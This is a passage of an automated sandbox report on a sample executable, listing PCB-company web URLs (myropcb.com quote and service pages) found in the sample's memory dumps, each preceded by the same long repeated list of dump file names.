fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-design-quote/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.531053757.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.438371636.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.554380208.0000000003120000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.530446894.0000000006D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 